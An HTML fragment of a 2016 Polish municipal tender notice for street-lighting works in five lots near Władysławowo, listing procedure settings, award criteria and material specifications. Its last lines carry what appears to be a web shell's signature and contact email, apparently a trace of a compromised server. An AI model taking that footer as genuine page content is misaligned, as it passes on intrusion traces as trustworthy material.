                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin realizacji</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />W zakresie przedłużenia Terminu zakończenia robót o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie Terminu zakończenia robót, w następujących sytuacjach: 
a) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie Terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego przekazania Terenu budowy, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie Terminu zakończenia robót, 
b) gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, 
c) gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, 
d) wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, 
e) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, 
f) jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy, 
g) wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. 

W zakresie zmiany wynagrodzenia: 
a) w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT. W przypadku ustawowego obniżenia lub podwyższenia stawki podatku od towarów i usług VAT w okresie realizacji umowy, Strony dokonają stosownej zmiany pozostałej do zapłaty należności wynikającej z umowy, po przeprowadzeniu ustaleń i zawarciu aneksu, dla tej części wynagrodzenia umownego, której zmiana dotyczy; 
b) Przewiduje się możliwość obniżenia wynagrodzenia ryczałtowego o wartość robót niewykonanych, uznanych przez Zamawiającego jako zbędne, choć objęte ofertą Wykonawcy oraz Specyfikacją Istotnych Warunków Zamówienia, przy czym ewentualne obniżenie wynagrodzenia nastąpi stosownie do wartości wynikających z kosztorysów szczegółowych z zestawieniem materiałów stanowiących załącznik nr 4 do umowy. 
c) Zamawiający w uzgodnieniu z Wykonawcą może w każdej chwili zarządzić wprowadzenie robót zamiennych o ekwiwalentnej wartości do wykonywanego zakresu umowy, w przypadku zaistnienia okoliczności wynikających z technologii lub funkcjonalności przedmiotu umowy. W takim przypadku, za zgodą stron podpisany zostanie stosowny aneks do umowy, przy przyjęciu zasady, że zakres i wartość każdej takiej modyfikacji zostanie poddana osobnej wycenie w oparciu o kosztorysy szczegółowe z zestawieniem materiałów stanowiące załączniki do umowy i kalkulację szczegółową wprowadzonych robót zamiennych sporządzoną w oparciu o nośniki cenotwórcze wynikające z załączonych do umowy kosztorysów szczegółowych z zestawieniem materiałów, przy czym w zakresie materiałów, które nie występowały ww. kosztorysach szczegółowych z zestawieniem materiałów, w oparciu o średnie ceny Sekocenbudu z ostatniego kwartału poprzedzającego rozliczenie. 

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 04/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego części ul. Lazurowej i Południowej w Ostrowie, ul. Nadbałtyckiej w Karwi<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Budowa oświetlenia drogowego części ul. Lazurowej w Ostrowie (rozdział 900-90015)

Opis:
ok. 166 m sieci kablowej YAKXS 4x25 (długość kabla 214 m) + bednarka 25x4mm
5 słupów oświetleniowych okrągłych - ocynkowane i malowane proszkowo na kolor RAL 9006 (srebrny aluminiowy  w kolorze oprawy) (7 m) wraz z fundamentem F120/43 i oprawami LED typu SL 20 mini 31,4W z redukcją mocy

UWAGA:
Gmina dostarczy obudowę złącza kablowego ZK-1 wraz rozłącznikiem bezpiecznikowym (Wskaże miejsca, z których będzie można tą szafkę i rozłącznik odebrać)


2.	Budowa oświetlenia drogowego części ul. Południowej w Ostrowie (rozdział 900-90015)

Opis:
ok. 143 m sieci kablowej YAKXS 4x35 (długość kabla 164 m) + bednarka 25x4mm
4 słupy oświetleniowe okrągłe - ocynkowane i malowane proszkowo na kolor RAL 9006 (srebrny aluminiowy  w kolorze oprawy) (7 m) wraz z fundamentem F120/43 i oprawami LED typu SL 20 mini 31,4W z redukcją mocy

3.	Budowa oświetlenia drogowego ul. Nadbałtyckiej w Karwi (rozdział 900-90015)

Opis:
a) przyłącze
ok. 22 m sieci kablowej YAKXS 4x25 (długość kabla 26 m) + bednarka 25x4mm
b) sieć oświetlenia
ok. 236 m sieci kablowej YAKXS 4x25 (długość kabla 314 m)
6 słupów oświetleniowych okrągłych - ocynkowane i malowane proszkowo na kolor RAL 9005 (czarny) (7 m) wraz z fundamentem F120/43 i oprawami LED typu SL 20 mini 44W z redukcją mocy
1 słup oświetleniowy okrągły - ocynkowany i malowany proszkowo na kolor RAL 9005 (czarny) o wys. 8 m wraz z wysięgnikiem typu EVA i z fundamentem F120/43 i oprawami LED typu SL 20 midi 62W z redukcją mocy
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45200000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin realizacji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Z uwagi na to, że termin realizacji zamówienia stanowi jedno z kryteriów oceny ofert, Zamawiający przyjmuje minimalny okres na realizację zamówienia: 45 dni, natomiast maksymalny termin: 60 dni.<br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego części ul. Modrzewskiego i Dąbrowskiej we Władysławowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa oświetlenia drogowego na osiedlu Żwirowa tj. części ul. Modrzewskiego i ul. Dąbrowskiej we Władysławowie (rozdział 900-90015)

Opis:
ok. 488 m sieci kablowej YAKXS 4x35 (długość kabla 561 m) + bednarka 25x4mm
14 słupów oświetleniowych okrągłych - ocynkowane i malowane proszkowo na kolor RAL 9005 (czarny) (8 m) wraz z fundamentem F120/43 i oprawami LED typu SL 20 mini 56W z redukcją mocy
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45200000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin realizacji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Z uwagi na to, że termin realizacji zamówienia stanowi jedno z kryteriów oceny ofert, Zamawiający przyjmuje minimalny okres na realizację zamówienia: 45 dni, natomiast maksymalny termin: 60 dni<br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego placu zabaw przy ul. Źródlanej i Szkutników we Władysławowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa oświetlenia drogowego placu zabaw przy ul. Źródlanej/Szkutników we Władysławowie (900-90015)

Opis:
ok. 362 m sieci kablowej YAKXS 4x35 (długość kabla 434 m) + bednarka 25x4mm
- 9 słupów oświetleniowych okrągłych (5szt. z pojedynczym wysięgnikiem typu MAYAL S, 4 szt. z podwójnym wysięgnikiem typu MAYAL D, w tym jeden w wykonaniu specjalnym)- ocynkowane i malowane proszkowo na kolor RAL 9005 (czarny) (np. Antares 7 m) wraz z fundamentem F120/43 i 9 szt. oprawami LED typu SL 20 mini 44W z redukcją mocy, dodatkowo z 4 szt. opraw LED typu SL 20 mini 31,4W z redukcją mocy (na podwójnym wysięgniku),
- 4 słupy oświetleniowe okrągłe z wysięgnikiem - ocynkowane i malowane proszkowo na kolor RAL 9005 (czarny) (np. typu EVA 8 m) wraz z fundamentem F120/43 i oprawami LED typu SL 20 mini 56W z redukcją mocy
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45200000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin realizacji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Z uwagi na to, że termin realizacji zamówienia stanowi jedno z kryteriów oceny ofert, Zamawiający przyjmuje minimalny okres na realizację zamówienia: 45 dni, natomiast maksymalny termin: 60 dni<br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego ul. Wiatrakowej w Tupadłach i części ul. Leona Wzorka w Rozewiu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa oświetlenia drogowego ul. Wiatrakowej w Tupadłach (rozdział 900-90015)

Opis:
ok. 85 m sieci kablowej YAKXS 4x25 (długość kabla 93 m) + bednarka 25x4mm
2 słupy oświetleniowe (8m) wraz z fundamentami z demontażu (odbiór z nieruchomości w miejscowości Rozewie), należy je przygotować do ponownego montażu (oczyścić i uzupełnić braki)

UWAGA:
Gmina wskaże miejsce odbioru słupów z fundamentami i oprawami

Budowa oświetlenia drogowego części ul. Leona Wzorka w Rozewiu (900-90015)

Opis:
ok. 396 m sieci kablowej YAKXS 4x35 (długość kabla 489 m) + bednarka 25x4mm
- 3 słupy oświetleniowe okrągłe (np. typu Auriga 6m)- ocynkowane i malowane proszkowo na kolor RAL 7035 (szary) stalowych bądź aluminiowych wraz z fundamentem F120/43 i oprawami LED typu SL 20 mini 31,4W z redukcją mocy (oprawy w kolorze fabrycznym)
- 8 słupów oświetleniowych okrągłych (o wys. 5m) - ocynkowane i malowane proszkowo na kolor RAL 7035 (szary) stalowych bądź aluminiowych wraz z wysięgnikiem podwójnym typu WR-2-2 fundamentem F120/43 i 8szt. opraw LED typu SL 20 micro 30W (oświetlające drogę) z redukcją mocy (oprawy w kolorze fabrycznym)

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45200000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin realizacji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Z uwagi na to, że termin realizacji zamówienia stanowi jedno z kryteriów oceny ofert, Zamawiający przyjmuje minimalny okres na realizację zamówienia: 45 dni, natomiast maksymalny termin: 60 dni<br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego Skweru nad Zatoką Pucką we Władysławowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa oświetlenia drogowego Skweru nad Zatoką we Władysławowie (900-90015)

Opis:
ok. 219 m sieci kablowej YAKXS 4x35 (długość kabla 276 m) + bednarka 25x4mm
- 6 słupów oświetleniowych okrągłych 10m, stalowych bądź aluminiowych - ocynkowane i malowane proszkowo bądź anodowany na kolor RAL 6020 (zielony) stalowych wraz z fundamentem F150/43 i oprawami LED typu Floodlight 20 mini 56W oraz 2 szt. SL 20 mini 44W (na dodatkowym wysięgniku na dwóch słupach wg szkicu) z redukcją mocy (oprawy w kolorze fabrycznym)
- 1 słup oświetleniowy okrągły, stalowy bądź aluminiowy - ocynkowane i malowane proszkowo bądź anodowany na kolor RAL 6020 (zielony) bez wysięgnika z fundamentem F120/43 i 1 szt. opraw LED typu SL 20 micro 30W (oświetlające drogę) z redukcją mocy (oprawy w kolorze fabrycznym)
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45200000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin realizacji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Z uwagi na to, że termin realizacji zamówienia stanowi jedno z kryteriów oceny ofert, Zamawiający przyjmuje minimalny okres na realizację zamówienia: 45 dni, natomiast maksymalny termin: 60 dni<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com